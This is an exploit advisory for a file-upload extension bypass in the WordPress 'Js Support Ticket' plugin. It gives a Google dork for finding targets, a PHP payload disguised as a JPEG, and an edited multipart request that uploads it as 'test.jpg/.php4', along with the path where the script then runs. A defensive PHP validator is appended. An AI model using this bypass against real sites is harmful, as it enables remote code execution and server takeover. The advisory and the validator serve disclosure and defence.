Wordpress "Js Support Ticket" File Upload Bypass Extensions

2015.12.05
Credit: Mgm-Eg
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Wordpress "Js Support Ticket" File Upload Bypass Extensions
# Google Dork: inurl:/js-support-ticket-controlpanel/
# Date: 3-12-2015
# Exploit Author: Mgm-Eg
# Vendor Homepage: http://joomsky.com/products/js-supprot-ticket-wp.html
# Version: 1.X.X
# Contact: https://ask.fm/m1g1m

---------------
1- Description
---------------
When you open a ticket you can upload attachments only of the file extension types doc, docx, odt, pdf, txt, png, jpeg and jpg, but you can bypass this check and upload other extensions.

--------------------
2- Proof of Concept
--------------------
1. In Notepad++ open a new file and add:

   GIF89a; <?php phpinfo(); ?>    # you can replace this code with your own code

   Save the file as test.jpg.

2. Open the ticket page, complete the required fields, and upload your test.jpg.

3. Using the Live HTTP Headers extension, open the request and edit the file name from "test.jpg" to "test.jpg/.php4" and delete "GIF89a;". Example:

   -----------------------------319722301512393
   Content-Disposition: form-data; name="filename[]"; filename="test.jpg/.php4"
   Content-Type: image/jpeg


   <?php phpinfo(); ?>
   -----------------------------319722301512393

# The file will be visible at:
# http://wordpress_site/wp-content/plugins/js-support-ticket/jssupportticketdata/attachmentdata/ticket/ticket_yourid/yourfile.php
# Also check your email to learn the path of your file, or open "My tickets" to see all tickets you have sent and find the path of your file.
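For the defensive side, the following is an added PHP example written for this page; it is not the plugin's own code and does not describe how the plugin performs its check. It shows an attachment validator that rejects the two request shapes described above: the client filename "test.jpg/.php4" (path separator, non-allowlisted final extension) and a file named test.jpg whose bytes begin with "GIF89a;" rather than a JPEG header. The extension allowlist is the one from the description; the magic-byte table, the function names and the random storage name are assumptions of the example.

```php
<?php
// Added example (not the plugin's own code): hardened attachment validation.
// The allowlist mirrors the extensions listed in the advisory description.
const ALLOWED_EXTENSIONS = ['doc', 'docx', 'odt', 'pdf', 'txt', 'png', 'jpeg', 'jpg'];

// Leading bytes expected for the binary types (assumed table for this example).
const MAGIC = [
    'png'  => "\x89PNG\r\n\x1a\n",
    'jpg'  => "\xFF\xD8\xFF",
    'jpeg' => "\xFF\xD8\xFF",
    'pdf'  => "%PDF-",
];

/**
 * Returns null when the upload is acceptable, otherwise a rejection reason.
 * $clientName is the filename from the Content-Disposition header (attacker
 * controlled); $bytes is the uploaded content.
 */
function validate_attachment(string $clientName, string $bytes): ?string {
    // 1. Path separators and NUL never belong in a client filename:
    //    "test.jpg/.php4" is refused here before any extension logic runs.
    if (strpbrk($clientName, "/\\\0") !== false) {
        return 'path separator or NUL in filename';
    }
    // 2. Decide on the LAST extension only, lower-cased, against the allowlist.
    $ext = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if ($ext === '' || !in_array($ext, ALLOWED_EXTENSIONS, true)) {
        return 'extension not in allowlist';
    }
    // 3. Exactly one dot: "test.jpg.php" and "test.php.jpg" are both refused.
    if (substr_count($clientName, '.') !== 1) {
        return 'multiple extensions';
    }
    // 4. Binary types must carry the matching header; a "jpg" whose bytes
    //    start with "GIF89a;" or "<?php" does not.
    if (array_key_exists($ext, MAGIC)
        && strncmp($bytes, MAGIC[$ext], strlen(MAGIC[$ext])) !== 0) {
        return 'content does not match extension';
    }
    return null;
}

/** Store under a server-chosen random name with the validated extension. */
function storage_name(string $ext): string {
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample inputs modelled on the advisory's requests.
$cases = [
    ['test.jpg/.php4', '<?php phpinfo(); ?>'],                   // edited request
    ['test.jpg',       'GIF89a; <?php phpinfo(); ?>'],           // original payload
    ['test.php4',      '<?php phpinfo(); ?>'],                   // plain bad extension
    ['photo.jpg',      "\xFF\xD8\xFF\xE0" . str_repeat("\0", 16)], // real JPEG prefix
];
foreach ($cases as [$name, $data]) {
    $why = validate_attachment($name, $data);
    printf("%-16s -> %s\n", $name,
        $why ?? 'accepted, stored as ' . storage_name(strtolower(pathinfo($name, PATHINFO_EXTENSION))));
}
```

Validation alone is not the whole fix: the attachment directory should also be served with script execution disabled (a web-server rule that refuses to run PHP from that path), so that a file which slips past the check is still delivered as data rather than executed.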


Copyright 2024, cxsecurity.com